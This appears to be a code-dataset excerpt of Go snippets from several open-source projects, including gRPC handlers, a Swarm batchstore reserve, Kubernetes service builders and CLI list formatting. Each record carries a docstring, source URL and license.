sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
isRawkv, err := sess.RawkvAccess(stream.Context(), req.Table)
if err != nil {
return status.Error(codes.Aborted, err.Error())
}
rtOpt := session.RetrieveTxnOpt{
Committable: false,
IsRawKV: isRawkv,
}
txn, err := sess.RetrieveTxn(stream.Context(), req.GetTransaction(), &rtOpt)
if err != nil {
streamReadCounterGerneralErr.Inc()
logutil.Logger(stream.Context()).Error("fetch transaction error", zap.Error(err))
return err
}
ctx := sessionctx.SetStreamReadKey(stream.Context())
ri, err := queryCtx.GetSession().HandleRead(ctx, req, txn)
if err != nil {
streamReadCounterGerneralErr.Inc()
logutil.Logger(stream.Context()).Error("stream sparse read error", zap.Error(err))
return status.Error(codes.Aborted, err.Error())
}
return rs.readStream(ctx, ri, stream.Send)
}
func (rs *RPCServer) BeginTransaction(ctx context.Context, req *tspb.BeginTransactionRequest) (*tspb.Transaction, error) {
queryCtx, err := rs.getQueryCtxBySessionID(req.GetSession())
if err != nil {
return nil, err
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
txnSel := &tspb.TransactionSelector{
Selector: &tspb.TransactionSelector_Begin{
Begin: req.GetOptions(),
},
}
txn, err := sess.RetrieveTxn(ctx, txnSel, nil)
if err != nil {
logutil.Logger(ctx).Error("session retrieve transaction error", zap.Error(err), zap.String("session", req.Session))
return nil, status.Errorf(codes.Internal, "begin transaction error %v", err)
}
transaction := &tspb.Transaction{
Id: []byte(txn.ID),
}
return transaction, nil
} | Apache License 2.0 |
33cn/chain33 | rpc/grpchandler.go | GetBlocks | go | func (g *Grpc) GetBlocks(ctx context.Context, in *pb.ReqBlocks) (*pb.Reply, error) {
reply, err := g.cli.GetBlocks(&pb.ReqBlocks{
Start: in.Start,
End: in.End,
IsDetail: in.IsDetail,
})
if err != nil {
return nil, err
}
return &pb.Reply{
IsOk: true,
Msg: pb.Encode(reply)},
nil
} | GetBlocks get blocks by grpc | https://github.com/33cn/chain33/blob/bfe0910b872e30fe937e270e9fc8e2f0db882125/rpc/grpchandler.go#L144-L157 | package rpc
import (
"time"
"strings"
"github.com/33cn/chain33/common"
pb "github.com/33cn/chain33/types"
"golang.org/x/net/context"
)
func (g *Grpc) SendTransactionSync(ctx context.Context, in *pb.Transaction) (*pb.Reply, error) {
reply, err := g.cli.SendTx(in)
if err != nil {
return reply, err
}
hash := in.Hash()
for i := 0; i < 100; i++ {
detail, err := g.cli.QueryTx(&pb.ReqHash{Hash: hash})
if err == pb.ErrInvalidParam || err == pb.ErrTypeAsset {
return nil, err
}
if detail != nil {
return &pb.Reply{IsOk: true, Msg: hash}, nil
}
time.Sleep(time.Second / 3)
}
return nil, pb.ErrTimeout
}
func (g *Grpc) SendTransaction(ctx context.Context, in *pb.Transaction) (*pb.Reply, error) {
return g.cli.SendTx(in)
}
func (g *Grpc) SendTransactions(ctx context.Context, in *pb.Transactions) (*pb.Replies, error) {
if len(in.GetTxs()) == 0 {
return nil, nil
}
reps := &pb.Replies{ReplyList: make([]*pb.Reply, 0, len(in.GetTxs()))}
for _, tx := range in.GetTxs() {
reply, err := g.cli.SendTx(tx)
if err != nil {
reply = &pb.Reply{Msg: []byte(err.Error())}
}
reps.ReplyList = append(reps.ReplyList, reply)
}
return reps, nil
}
func (g *Grpc) CreateNoBalanceTxs(ctx context.Context, in *pb.NoBalanceTxs) (*pb.ReplySignRawTx, error) {
reply, err := g.cli.CreateNoBalanceTxs(in)
if err != nil {
return nil, err
}
tx := pb.Encode(reply)
return &pb.ReplySignRawTx{TxHex: common.ToHex(tx)}, nil
}
func (g *Grpc) CreateNoBalanceTransaction(ctx context.Context, in *pb.NoBalanceTx) (*pb.ReplySignRawTx, error) {
params := &pb.NoBalanceTxs{
TxHexs: []string{in.GetTxHex()},
PayAddr: in.GetPayAddr(),
Privkey: in.GetPrivkey(),
Expire: in.GetExpire(),
}
reply, err := g.cli.CreateNoBalanceTxs(params)
if err != nil {
return nil, err
}
tx := pb.Encode(reply)
return &pb.ReplySignRawTx{TxHex: common.ToHex(tx)}, nil
}
func (g *Grpc) CreateRawTransaction(ctx context.Context, in *pb.CreateTx) (*pb.UnsignTx, error) {
reply, err := g.cli.CreateRawTransaction(in)
if err != nil {
return nil, err
}
return &pb.UnsignTx{Data: reply}, nil
}
func (g *Grpc) ReWriteRawTx(ctx context.Context, in *pb.ReWriteRawTx) (*pb.UnsignTx, error) {
reply, err := g.cli.ReWriteRawTx(in)
if err != nil {
return nil, err
}
return &pb.UnsignTx{Data: reply}, nil
}
func (g *Grpc) CreateTransaction(ctx context.Context, in *pb.CreateTxIn) (*pb.UnsignTx, error) {
pb.AssertConfig(g.cli)
cfg := g.cli.GetConfig()
execer := cfg.ExecName(string(in.Execer))
exec := pb.LoadExecutorType(execer)
if exec == nil {
log.Error("callExecNewTx", "Error", "exec not found")
return nil, pb.ErrNotSupport
}
msg, err := exec.GetAction(in.ActionName)
if err != nil {
return nil, err
}
err = pb.Decode(in.Payload, msg)
if err != nil {
return nil, err
}
reply, err := pb.CallCreateTx(cfg, execer, in.ActionName, msg)
if err != nil {
return nil, err
}
return &pb.UnsignTx{Data: reply}, nil
}
func (g *Grpc) CreateRawTxGroup(ctx context.Context, in *pb.CreateTransactionGroup) (*pb.UnsignTx, error) {
reply, err := g.cli.CreateRawTxGroup(in)
if err != nil {
return nil, err
}
return &pb.UnsignTx{Data: reply}, nil
}
func (g *Grpc) QueryTransaction(ctx context.Context, in *pb.ReqHash) (*pb.TransactionDetail, error) {
return g.cli.QueryTx(in)
} | BSD 3-Clause New or Revised License |
pydio/cells-sdk-go | client/user_service/put_roles_parameters.go | SetLogin | go | func (o *PutRolesParams) SetLogin(login string) {
o.Login = login
} | SetLogin adds the login to the put roles params | https://github.com/pydio/cells-sdk-go/blob/25705a3e4eebd44f9f2a253098c0c0b9b5018adc/client/user_service/put_roles_parameters.go#L117-L119 | package user_service
import (
"net/http"
"time"
"golang.org/x/net/context"
"github.com/go-openapi/errors"
"github.com/go-openapi/runtime"
cr "github.com/go-openapi/runtime/client"
strfmt "github.com/go-openapi/strfmt"
models "github.com/pydio/cells-sdk-go/models"
)
func NewPutRolesParams() *PutRolesParams {
var ()
return &PutRolesParams{
timeout: cr.DefaultTimeout,
}
}
func NewPutRolesParamsWithTimeout(timeout time.Duration) *PutRolesParams {
var ()
return &PutRolesParams{
timeout: timeout,
}
}
func NewPutRolesParamsWithContext(ctx context.Context) *PutRolesParams {
var ()
return &PutRolesParams{
Context: ctx,
}
}
func NewPutRolesParamsWithHTTPClient(client *http.Client) *PutRolesParams {
var ()
return &PutRolesParams{
HTTPClient: client,
}
}
type PutRolesParams struct {
Login string
Body *models.IdmUser
timeout time.Duration
Context context.Context
HTTPClient *http.Client
}
func (o *PutRolesParams) WithTimeout(timeout time.Duration) *PutRolesParams {
o.SetTimeout(timeout)
return o
}
func (o *PutRolesParams) SetTimeout(timeout time.Duration) {
o.timeout = timeout
}
func (o *PutRolesParams) WithContext(ctx context.Context) *PutRolesParams {
o.SetContext(ctx)
return o
}
func (o *PutRolesParams) SetContext(ctx context.Context) {
o.Context = ctx
}
func (o *PutRolesParams) WithHTTPClient(client *http.Client) *PutRolesParams {
o.SetHTTPClient(client)
return o
}
func (o *PutRolesParams) SetHTTPClient(client *http.Client) {
o.HTTPClient = client
}
func (o *PutRolesParams) WithLogin(login string) *PutRolesParams {
o.SetLogin(login)
return o
} | Apache License 2.0 |
ethersphere/bee | pkg/postage/batchstore/reserve.go | evictOuter | go | func (s *store) evictOuter(last *postage.Batch) error {
if s.rs.Available >= 0 {
return nil
}
err := s.store.Iterate(valueKeyPrefix, func(key, _ []byte) (bool, error) {
batchID := valueKeyToID(key)
b := last
if !bytes.Equal(b.ID, batchID) {
var err error
b, err = s.Get(batchID)
if err != nil {
return true, fmt.Errorf("release get %x %v: %w", batchID, b, err)
}
}
if b.Value.Cmp(s.rs.Outer) < 0 {
return false, nil
}
if s.rs.Available >= 0 && s.rs.Outer.Cmp(b.Value) != 0 {
return true, nil
}
s.rs.Available += exp2(uint(b.Depth) - uint(s.rs.Radius) - 1)
s.rs.Outer.Set(b.Value)
return false, s.unreserveFn(b.ID, s.rs.Radius)
})
if err != nil {
return err
}
s.rs.Outer.Add(s.rs.Outer, big1)
if s.rs.Available < 0 {
s.rs.Radius++
s.rs.Outer.Set(s.rs.Inner)
return s.evictOuter(last)
}
return s.store.Put(reserveStateKey, s.rs)
} | evictOuter is responsible for keeping capacity positive by unreserving lowest priority batches | https://github.com/ethersphere/bee/blob/a7d86e068f7eb34703565d90e2e567d16b782a0e/pkg/postage/batchstore/reserve.go#L329-L371 | package batchstore
import (
"bytes"
"encoding/binary"
"errors"
"fmt"
"math/big"
"strings"
"github.com/ethersphere/bee/pkg/postage"
"github.com/ethersphere/bee/pkg/storage"
"github.com/ethersphere/bee/pkg/swarm"
)
var DefaultDepth = uint8(12)
var Capacity = exp2(22)
var big1 = big.NewInt(1)
type reserveState struct {
Radius uint8 `json:"radius"`
StorageRadius uint8 `json:"storageRadius"`
Available int64 `json:"available"`
Outer *big.Int `json:"outer"`
Inner *big.Int `json:"inner"`
}
func (s *store) unreserve(b []byte, radius uint8) error {
c := s.queueIdx
c++
v := make([]byte, 8)
binary.BigEndian.PutUint64(v, c)
i := &UnreserveItem{BatchID: b, Radius: radius}
if err := s.store.Put(fmt.Sprintf("%s_%s", unreserveQueueKey, string(v)), i); err != nil {
return err
}
if err := s.putQueueCardinality(c); err != nil {
return err
}
s.queueIdx = c
return nil
}
func (s *store) Unreserve(cb postage.UnreserveIteratorFn) error {
var entries []string
defer func() {
for _, v := range entries {
if err := s.store.Delete(v); err != nil {
s.logger.Errorf("batchstore: unreserve entry delete: %v", err)
return
}
}
}()
return s.store.Iterate(unreserveQueueKey, func(key, val []byte) (bool, error) {
if !strings.HasPrefix(string(key), unreserveQueueKey) {
return true, nil
}
v := &UnreserveItem{}
err := v.UnmarshalBinary(val)
if err != nil {
return true, err
}
stop, err := cb(v.BatchID, v.Radius)
if err != nil {
return true, err
}
s.rsMtx.Lock()
defer s.rsMtx.Unlock()
if s.rs.StorageRadius+1 < v.Radius {
s.rs.StorageRadius = v.Radius - 1
s.metrics.StorageRadius.Set(float64(s.rs.StorageRadius))
if err = s.store.Put(reserveStateKey, s.rs); err != nil {
return true, err
}
}
entries = append(entries, string(key))
if stop {
return true, nil
}
return false, nil
})
}
func (s *store) evictExpired() error {
var toDelete [][]byte
until := new(big.Int)
if s.rs.Inner.Cmp(big.NewInt(0)) > 0 && s.cs.TotalAmount.Cmp(s.rs.Inner) >= 0 {
until.Add(s.cs.TotalAmount, big1)
} else {
until.Set(s.rs.Inner)
}
var multiplier int64
err := s.store.Iterate(valueKeyPrefix, func(key, _ []byte) (bool, error) {
b, err := s.Get(valueKeyToID(key))
if err != nil {
return true, err
}
if b.Value.Cmp(until) >= 0 {
return true, nil
}
if multiplier == 0 && b.Value.Cmp(s.rs.Inner) >= 0 {
multiplier = 1
}
if multiplier == 1 && b.Value.Cmp(s.rs.Outer) >= 0 {
multiplier = 2
}
err = s.evictFn(b.ID)
if err != nil {
return true, err
}
s.rs.Available += multiplier * exp2(uint(b.Radius-s.rs.Radius-1))
if b.Value.Cmp(s.cs.TotalAmount) <= 0 {
toDelete = append(toDelete, b.ID)
}
return false, nil
})
if err != nil {
return err
}
s.rs.Inner.Set(until)
if s.rs.Outer.Cmp(until) < 0 {
s.rs.Outer.Set(until)
}
if err = s.store.Put(reserveStateKey, s.rs); err != nil {
return err
}
return s.delete(toDelete...)
}
type tier int
const (
unreserved tier = iota
inner
outer
)
func (rs *reserveState) change(oldv, newv *big.Int, oldDepth, newDepth uint8) (int64, uint8) {
oldTier := rs.tier(oldv)
newTier := rs.setLimits(newv, rs.tier(newv))
oldSize := rs.size(oldDepth, oldTier)
newSize := rs.size(newDepth, newTier)
availableCapacityChange := oldSize - newSize
reserveRadius := rs.radius(newTier)
return availableCapacityChange, reserveRadius
}
func (rs *reserveState) size(depth uint8, t tier) int64 {
size := exp2(uint(depth - rs.Radius - 1))
switch t {
case inner:
return size
case outer:
return 2 * size
default:
return 0
}
}
func (rs *reserveState) tier(x *big.Int) tier {
if x.Cmp(rs.Inner) < 0 || rs.Inner.Cmp(big.NewInt(0)) == 0 {
return unreserved
}
if x.Cmp(rs.Outer) < 0 {
return inner
}
return outer
}
func (rs *reserveState) radius(t tier) uint8 {
switch t {
case unreserved:
return swarm.MaxPO
case inner:
return rs.Radius
default:
return rs.Radius - 1
}
}
func (rs *reserveState) setLimits(val *big.Int, newTier tier) tier {
if newTier != unreserved {
return newTier
}
var adjustedTier tier
if rs.Inner.Cmp(big.NewInt(0)) == 0 || rs.Inner.Cmp(val) > 0 {
adjustedTier = inner
if rs.Outer.Cmp(rs.Inner) == 0 {
rs.Outer.Set(val)
adjustedTier = outer
}
rs.Inner.Set(val)
}
return adjustedTier
}
func (s *store) update(b *postage.Batch, oldDepth uint8, oldValue *big.Int) error {
newValue := b.Value
newDepth := b.Depth
capacityChange, reserveRadius := s.rs.change(oldValue, newValue, oldDepth, newDepth)
s.rs.Available += capacityChange
if err := s.unreserveFn(b.ID, reserveRadius); err != nil {
return err
}
err := s.evictOuter(b)
if err != nil {
return err
}
s.metrics.AvailableCapacity.Set(float64(s.rs.Available))
s.metrics.Radius.Set(float64(s.rs.Radius))
s.metrics.Inner.Set(float64(s.rs.Inner.Int64()))
s.metrics.Outer.Set(float64(s.rs.Outer.Int64()))
return nil
} | BSD 3-Clause New or Revised License |
kylebanks/commuter | cli/parser.go | parseConfigureCmd | go | func (a *ArgParser) parseConfigureCmd(s cmd.StorageProvider) (*cmd.ConfigureCmd, error) {
return &cmd.ConfigureCmd{
Input: NewStdin(),
Store: s,
}, nil
} | parseConfigureCmd parses and returns a ConfigureCmd. | https://github.com/kylebanks/commuter/blob/a021e2d6424b9fe12415ad5ff25cbd433004ac6f/cli/parser.go#L40-L45 | package cli
import (
"flag"
"github.com/KyleBanks/commuter/cmd"
"github.com/KyleBanks/commuter/pkg/geo"
)
type ArgParser struct {
Args []string
}
func NewArgParser(args []string) *ArgParser {
return &ArgParser{
Args: args,
}
}
func (a *ArgParser) Parse(conf *cmd.Configuration, s cmd.StorageProvider) (cmd.RunnerValidator, error) {
if conf == nil || len(a.Args) == 0 {
return a.parseConfigureCmd(s)
}
switch a.Args[0] {
case cmdAdd:
return a.parseAddCmd(s, a.Args[1:])
case cmdList:
return a.parseListCmd(s, a.Args[1:])
}
return a.parseCommuteCmd(conf, a.Args)
} | MIT License |
k8ssandra/cass-operator | pkg/reconciliation/construct_service.go | newNodePortServiceForCassandraDatacenter | go | func newNodePortServiceForCassandraDatacenter(dc *api.CassandraDatacenter) *corev1.Service {
service := makeGenericHeadlessService(dc)
service.ObjectMeta.Name = dc.GetNodePortServiceName()
service.Spec.Type = "NodePort"
service.Spec.ClusterIP = ""
service.Spec.ExternalTrafficPolicy = corev1.ServiceExternalTrafficPolicyTypeLocal
nativePort := dc.GetNodePortNativePort()
internodePort := dc.GetNodePortInternodePort()
service.Spec.Ports = []corev1.ServicePort{
{
Name: "internode",
Port: int32(internodePort),
NodePort: int32(internodePort),
TargetPort: intstr.FromInt(internodePort),
},
{
Name: "native",
Port: int32(nativePort),
NodePort: int32(nativePort),
TargetPort: intstr.FromInt(nativePort),
},
}
addAdditionalOptions(service, &dc.Spec.AdditionalServiceConfig.NodePortService)
return service
} | newNodePortServiceForCassandraDatacenter creates a headless service owned by the CassandraDatacenter,
that preserves the client source IPs | https://github.com/k8ssandra/cass-operator/blob/9b1d3797278a5cd1653d64611a312427d1b0a482/pkg/reconciliation/construct_service.go#L206-L236 | package reconciliation
import (
"net"
api "github.com/k8ssandra/cass-operator/apis/cassandra/v1beta1"
"github.com/k8ssandra/cass-operator/pkg/oplabels"
"github.com/k8ssandra/cass-operator/pkg/utils"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/util/intstr"
)
func newServiceForCassandraDatacenter(dc *api.CassandraDatacenter) *corev1.Service {
svcName := dc.GetDatacenterServiceName()
service := makeGenericHeadlessService(dc)
service.ObjectMeta.Name = svcName
nativePort := api.DefaultNativePort
if dc.IsNodePortEnabled() {
nativePort = dc.GetNodePortNativePort()
}
ports := []corev1.ServicePort{
namedServicePort("native", nativePort, nativePort),
namedServicePort("tls-native", 9142, 9142),
namedServicePort("mgmt-api", 8080, 8080),
namedServicePort("prometheus", 9103, 9103),
namedServicePort("thrift", 9160, 9160),
}
if dc.Spec.DseWorkloads != nil {
if dc.Spec.DseWorkloads.AnalyticsEnabled {
ports = append(
ports,
namedServicePort("dsefs-public", 5598, 5598),
namedServicePort("spark-worker", 7081, 7081),
namedServicePort("jobserver", 8090, 8090),
namedServicePort("always-on-sql", 9077, 9077),
namedServicePort("sql-thrift", 10000, 10000),
namedServicePort("spark-history", 18080, 18080),
)
}
if dc.Spec.DseWorkloads.GraphEnabled {
ports = append(
ports,
namedServicePort("gremlin", 8182, 8182),
)
}
if dc.Spec.DseWorkloads.SearchEnabled {
ports = append(
ports,
namedServicePort("solr", 8983, 8983),
)
}
}
service.Spec.Ports = ports
addAdditionalOptions(service, &dc.Spec.AdditionalServiceConfig.DatacenterService)
utils.AddHashAnnotation(service)
return service
}
func addAdditionalOptions(service *corev1.Service, serviceConfig *api.ServiceConfigAdditions) {
if serviceConfig.Labels != nil && len(serviceConfig.Labels) > 0 {
if service.Labels == nil {
service.Labels = make(map[string]string, len(serviceConfig.Labels))
}
for k, v := range serviceConfig.Labels {
service.Labels[k] = v
}
}
if serviceConfig.Annotations != nil && len(serviceConfig.Annotations) > 0 {
if service.Annotations == nil {
service.Annotations = make(map[string]string, len(serviceConfig.Annotations))
}
for k, v := range serviceConfig.Annotations {
service.Annotations[k] = v
}
}
}
func namedServicePort(name string, port int, targetPort int) corev1.ServicePort {
return corev1.ServicePort{Name: name, Port: int32(port), TargetPort: intstr.FromInt(targetPort)}
}
func buildLabelSelectorForSeedService(dc *api.CassandraDatacenter) map[string]string {
labels := dc.GetClusterLabels()
labels[api.SeedNodeLabel] = "true"
return labels
}
func newSeedServiceForCassandraDatacenter(dc *api.CassandraDatacenter) *corev1.Service {
service := makeGenericHeadlessService(dc)
service.ObjectMeta.Name = dc.GetSeedServiceName()
labels := dc.GetClusterLabels()
oplabels.AddManagedByLabel(labels)
service.ObjectMeta.Labels = labels
service.Spec.Selector = buildLabelSelectorForSeedService(dc)
service.Spec.PublishNotReadyAddresses = true
addAdditionalOptions(service, &dc.Spec.AdditionalServiceConfig.SeedService)
utils.AddHashAnnotation(service)
return service
}
func newAdditionalSeedServiceForCassandraDatacenter(dc *api.CassandraDatacenter) *corev1.Service {
labels := dc.GetDatacenterLabels()
oplabels.AddManagedByLabel(labels)
var service corev1.Service
service.ObjectMeta.Name = dc.GetAdditionalSeedsServiceName()
service.ObjectMeta.Namespace = dc.Namespace
service.ObjectMeta.Labels = labels
service.Spec.Type = "ClusterIP"
service.Spec.ClusterIP = "None"
service.Spec.PublishNotReadyAddresses = true
addAdditionalOptions(&service, &dc.Spec.AdditionalServiceConfig.AdditionalSeedService)
utils.AddHashAnnotation(&service)
return &service
}
func newEndpointsForAdditionalSeeds(dc *api.CassandraDatacenter) (*corev1.Endpoints, error) {
labels := dc.GetDatacenterLabels()
oplabels.AddManagedByLabel(labels)
endpoints := corev1.Endpoints{}
endpoints.ObjectMeta.Name = dc.GetAdditionalSeedsServiceName()
endpoints.ObjectMeta.Namespace = dc.Namespace
endpoints.ObjectMeta.Labels = labels
addresses := make([]corev1.EndpointAddress, 0, len(dc.Spec.AdditionalSeeds))
for _, additionalSeed := range dc.Spec.AdditionalSeeds {
if ip := net.ParseIP(additionalSeed); ip != nil {
addresses = append(addresses, corev1.EndpointAddress{
IP: additionalSeed,
})
} else {
additionalSeedIPs, err := resolveAddress(additionalSeed)
if err != nil {
return nil, err
}
for _, address := range additionalSeedIPs {
addresses = append(addresses, corev1.EndpointAddress{
IP: address,
})
}
}
}
endpoints.Subsets = []corev1.EndpointSubset{
{
Addresses: addresses,
},
}
utils.AddHashAnnotation(&endpoints)
return &endpoints, nil
}
func resolveAddress(hostname string) ([]string, error) {
ips, err := net.LookupIP(hostname)
if err != nil {
return []string{}, err
}
ipStrings := make([]string, 0, len(ips))
for _, ip := range ips {
if ip.To4() != nil {
ipStrings = append(ipStrings, ip.String())
}
}
return ipStrings, nil
} | Apache License 2.0 |
keyfuse/tokucore | xcore/address_p2wsh_v0.go | Hash160 | go | func (a *PayToWitnessV0ScriptHashAddress) Hash160() []byte {
return a.witnessProgram[:]
} | Hash160 -- the address hash160 bytes.
Here is sha256, not hash160. | https://github.com/keyfuse/tokucore/blob/d2b8996b1e5602e00988fa7b5b9c87ab150d4567/xcore/address_p2wsh_v0.go#L51-L53 | package xcore
import (
"github.com/keyfuse/tokucore/network"
"github.com/keyfuse/tokucore/xbase"
)
type PayToWitnessV0ScriptHashAddress struct {
witnessVersion byte
witnessProgram [32]byte
}
func NewPayToWitnessV0ScriptHashAddress(witnessProgram []byte) Address {
if len(witnessProgram) != 32 {
return nil
}
var witness [32]byte
copy(witness[:], witnessProgram)
return &PayToWitnessV0ScriptHashAddress{
witnessVersion: 0x00,
witnessProgram: witness,
}
}
func (a *PayToWitnessV0ScriptHashAddress) ToString(net *network.Network) string {
str, err := xbase.WitnessEncode(net.Bech32HRPSegwit, a.witnessVersion, a.witnessProgram[:])
if err != nil {
return ""
}
return str
} | BSD 3-Clause New or Revised License |
fuzzystatic/blizzard | wowsearch/search.go | Tag | go | func Tag(value string) *TagSelector {
return &TagSelector{value: value}
} | Tag is used only for media documents.
Specifies the type of media document (item, spell, creature-display, etc) to query.
Example: wowsearch.Tag("item") | https://github.com/fuzzystatic/blizzard/blob/3990db51d95255824dd109aac21c7591c7ec5db7/wowsearch/search.go#L139-L141 | package wowsearch
import (
"fmt"
"net/url"
"strings"
)
type Opt interface {
Apply(*[]string)
}
func Field() *FieldSelector {
return &FieldSelector{}
}
type FieldSelector struct {
parts []string
}
func (s *FieldSelector) AND(field, value string) *FieldSelector {
s.parts = append(s.parts, fmt.Sprintf("%s=%s", url.QueryEscape(field), url.QueryEscape(value)))
return s
}
func (s *FieldSelector) OR(field string, values ...string) *FieldSelector {
for i, val := range values {
values[i] = url.QueryEscape(val)
}
s.parts = append(s.parts, fmt.Sprintf("%s=%s", url.QueryEscape(field), strings.Join(values, "||")))
return s
}
func (s *FieldSelector) NOT(field, value string) *FieldSelector {
s.parts = append(s.parts, fmt.Sprintf("%s!=%s", url.QueryEscape(field), url.QueryEscape(value)))
return s
}
func (s *FieldSelector) RANGE(field string, start, stop int) *FieldSelector {
s.parts = append(s.parts, fmt.Sprintf("%s=[%d,%d]", url.QueryEscape(field), start, stop))
return s
}
func (s *FieldSelector) MIN(field string, value int) *FieldSelector {
s.parts = append(s.parts, fmt.Sprintf("%s=[%d,]", url.QueryEscape(field), value))
return s
}
func (s *FieldSelector) MAX(field string, value int) *FieldSelector {
s.parts = append(s.parts, fmt.Sprintf("%s=[,%d]", url.QueryEscape(field), value))
return s
}
func (s *FieldSelector) Apply(v *[]string) {
*v = append(*v, strings.Join(s.parts, "&"))
}
func Page(page int) Opt {
if page < 1 {
page = 1
}
return &PageSelector{page: page}
}
type PageSelector struct {
page int
}
func (s *PageSelector) Apply(v *[]string) {
*v = append(*v, fmt.Sprintf("_page=%d", s.page))
}
func PageSize(size int) *PageSizeSelector {
switch {
case size < 1:
size = 1
case size > 1000:
size = 1000
}
return &PageSizeSelector{size: size}
}
type PageSizeSelector struct {
size int
}
func (s *PageSizeSelector) Apply(v *[]string) {
*v = append(*v, fmt.Sprintf("_pageSize=%d", s.size))
}
func OrderBy(fields ...string) *OrderBySelector {
return &OrderBySelector{fields: fields}
}
type OrderBySelector struct {
fields []string
}
func (s *OrderBySelector) Apply(v *[]string) {
for i, val := range s.fields {
s.fields[i] = url.QueryEscape(val)
}
*v = append(*v, fmt.Sprintf("orderby=%s", strings.Join(s.fields, ",")))
} | MIT License |
gookit/gcli | show/list.go | String | go | func (ls *Lists) String() string {
return ls.Format()
} | String returns formatted string | https://github.com/gookit/gcli/blob/37bbd035319b4d39a30db462bab462a3a6d40477/show/list.go#L217-L219 | package show
import (
"bytes"
"os"
"github.com/gookit/color"
"github.com/gookit/goutil/strutil"
)
type ListOption struct {
IgnoreEmpty bool
UpperFirst bool
SepChar string
LeftIndent string
KeyWidth int
KeyMinWidth int
KeyStyle string
ValueStyle string
TitleStyle string
}
type List struct {
Base
Opts *ListOption
title string
data interface{}
buffer *bytes.Buffer
}
func (l *List) SetBuffer(buffer *bytes.Buffer) {
l.buffer = buffer
}
func NewList(title string, data interface{}) *List {
return &List{
title: title,
data: data,
Base: Base{output: os.Stdout},
Opts: &ListOption{
SepChar: " ",
KeyStyle: "info",
LeftIndent: " ",
KeyMinWidth: 8,
IgnoreEmpty: true,
TitleStyle: "comment",
},
}
}
func (l *List) WithOptions(fn func(opts *ListOption)) *List {
if fn != nil {
fn(l.Opts)
}
return l
}
func (l *List) Format() string {
if l.data == nil || l.formatted != "" {
return l.formatted
}
if l.buffer == nil {
l.buffer = new(bytes.Buffer)
}
if l.title != "" {
title := strutil.UpperWord(l.title)
l.buffer.WriteString(color.WrapTag(title, l.Opts.TitleStyle) + "\n")
}
items := NewItems(l.data)
keyWidth := items.KeyMaxWidth(l.Opts.KeyWidth)
if keyWidth < l.Opts.KeyMinWidth {
keyWidth = l.Opts.KeyMinWidth
}
for _, item := range items.List {
if l.Opts.IgnoreEmpty && item.Val == "" {
continue
}
if l.Opts.LeftIndent != "" {
l.buffer.WriteString(l.Opts.LeftIndent)
}
if items.itemType == ItemMap {
key := strutil.PadRight(item.Key, " ", keyWidth)
key = color.WrapTag(key, l.Opts.KeyStyle)
l.buffer.WriteString(key + l.Opts.SepChar)
}
val := item.Val
if l.Opts.UpperFirst {
val = strutil.UpperFirst(val)
}
l.buffer.WriteString(val + "\n")
}
l.formatted = l.buffer.String()
return l.formatted
}
func (l *List) String() string {
return l.Format()
}
func (l *List) Print() {
l.Format()
l.Base.Print()
}
func (l *List) Println() {
l.Format()
l.Base.Println()
}
func (l *List) Flush() {
l.Println()
l.buffer.Reset()
l.formatted = ""
}
type Lists struct {
Base
Opts *ListOption
rows []*List
buffer *bytes.Buffer
}
func NewLists(listMap map[string]interface{}) *Lists {
ls := &Lists{
Opts: &ListOption{
SepChar: " ",
KeyStyle: "info",
LeftIndent: " ",
KeyMinWidth: 8,
IgnoreEmpty: true,
TitleStyle: "comment",
},
}
for title, data := range listMap {
ls.rows = append(ls.rows, NewList(title, data))
}
return ls
}
func (ls *Lists) WithOptions(fn func(opts *ListOption)) *Lists {
if fn != nil {
fn(ls.Opts)
}
return ls
}
func (ls *Lists) Format() string {
if len(ls.rows) == 0 || ls.formatted != "" {
return ls.formatted
}
ls.buffer = new(bytes.Buffer)
for _, list := range ls.rows {
list.Opts = ls.Opts
list.SetBuffer(ls.buffer)
list.Format()
}
ls.formatted = ls.buffer.String()
return ls.formatted
} | MIT License |
celrenheit/alfred | vendor/github.com/stretchr/testify/require/require_forward.go | EqualValuesf | go | func (a *Assertions) EqualValuesf(expected interface{}, actual interface{}, msg string, args ...interface{}) {
EqualValuesf(a.t, expected, actual, msg, args...)
} | EqualValuesf asserts that two objects are equal or convertable to the same types
and equal.
a.EqualValuesf(uint32(123, "error message %s", "formatted"), int32(123)) | https://github.com/celrenheit/alfred/blob/c19fe4f23ae43517f2ec11cf7f33b91c73a852d6/vendor/github.com/stretchr/testify/require/require_forward.go#L130-L132 | package require
import (
assert "github.com/stretchr/testify/assert"
http "net/http"
url "net/url"
time "time"
)
func (a *Assertions) Condition(comp assert.Comparison, msgAndArgs ...interface{}) {
Condition(a.t, comp, msgAndArgs...)
}
func (a *Assertions) Conditionf(comp assert.Comparison, msg string, args ...interface{}) {
Conditionf(a.t, comp, msg, args...)
}
func (a *Assertions) Contains(s interface{}, contains interface{}, msgAndArgs ...interface{}) {
Contains(a.t, s, contains, msgAndArgs...)
}
func (a *Assertions) Containsf(s interface{}, contains interface{}, msg string, args ...interface{}) {
Containsf(a.t, s, contains, msg, args...)
}
func (a *Assertions) DirExists(path string, msgAndArgs ...interface{}) {
DirExists(a.t, path, msgAndArgs...)
}
func (a *Assertions) DirExistsf(path string, msg string, args ...interface{}) {
DirExistsf(a.t, path, msg, args...)
}
func (a *Assertions) ElementsMatch(listA interface{}, listB interface{}, msgAndArgs ...interface{}) {
ElementsMatch(a.t, listA, listB, msgAndArgs...)
}
func (a *Assertions) ElementsMatchf(listA interface{}, listB interface{}, msg string, args ...interface{}) {
ElementsMatchf(a.t, listA, listB, msg, args...)
}
func (a *Assertions) Empty(object interface{}, msgAndArgs ...interface{}) {
Empty(a.t, object, msgAndArgs...)
}
func (a *Assertions) Emptyf(object interface{}, msg string, args ...interface{}) {
Emptyf(a.t, object, msg, args...)
}
func (a *Assertions) Equal(expected interface{}, actual interface{}, msgAndArgs ...interface{}) {
Equal(a.t, expected, actual, msgAndArgs...)
}
func (a *Assertions) EqualError(theError error, errString string, msgAndArgs ...interface{}) {
EqualError(a.t, theError, errString, msgAndArgs...)
}
func (a *Assertions) EqualErrorf(theError error, errString string, msg string, args ...interface{}) {
EqualErrorf(a.t, theError, errString, msg, args...)
}
func (a *Assertions) EqualValues(expected interface{}, actual interface{}, msgAndArgs ...interface{}) {
EqualValues(a.t, expected, actual, msgAndArgs...)
} | Apache License 2.0 |
czerwonk/junos_exporter | interfacediagnostics/collector.go | Name | go | func (*interfaceDiagnosticsCollector) Name() string {
return "Interface Diagnostics"
